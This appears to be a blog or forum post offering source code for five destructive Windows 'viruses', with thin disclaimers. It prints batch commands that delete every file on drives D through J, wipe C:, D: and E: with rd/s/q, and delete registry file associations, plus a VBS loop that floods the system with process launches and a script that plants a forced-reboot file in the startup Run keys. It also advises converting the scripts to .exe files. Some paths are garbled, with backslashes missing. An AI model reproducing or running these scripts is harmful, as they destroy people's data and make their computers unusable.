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source code for 5 most powerful virus.

Hello there,

  • Before you move further i want to tell you that this source codes are for educational purposes and not written by me.

  • Do not run this on your pc or any of your family/friends pc.

  • These types of programs can be very harmful and some of them can make your pc never open.

  • Run it at your own risk.

  • I will not be responsible for any damage.

  • Thank you


(save as .bat)

@echo off del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q del J:\*.* /f /s /q

This virus is pretty much harmful cuz it will delete all of your drivers except the (c:) drive... all you gotta do is save it as .bat file and convert it to .exe using (bat to exe converter program) and run it on the pc......!! (do not run it) --------------------------------------------------------------------------------------------


@ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/*

Note: Do not run this virus on your or anyone's pc... This virus is very harmful it will delete the registry files of your computer, making your pc completely useless and unusable..!! --------------------------------------------------------------------------------------------


(save as .VBS)

Option Explicit

Dim WSHShell Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” Next

After this virus is activated... your computer will be useless, turn your computer off and game over .... your pc's gone its never gonna open again.... please do not run this program...I repeat do not run this program.!! --------------------------------------------------------------------------------------------


rd/s/q D:\ rd/s/q C:\ rd/s/q E:\

This virus doesn't turn off your pc but it resets all your driver pretty much all it does is wipe out your pc ... people will be pissed and you will get a good ass whooping...!! --------------------------------------------------------------------------------------------


echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f echo You fucking idiot buy a new pc. PAUSE

This virus is very harmful one with the msg "you are nailed,Buy a new computer This is piece of shit" you can also change the message subject.... after this virus is activate your system will shut down and your pc will never open.....!! --------------------------------------------------------------------------------------------


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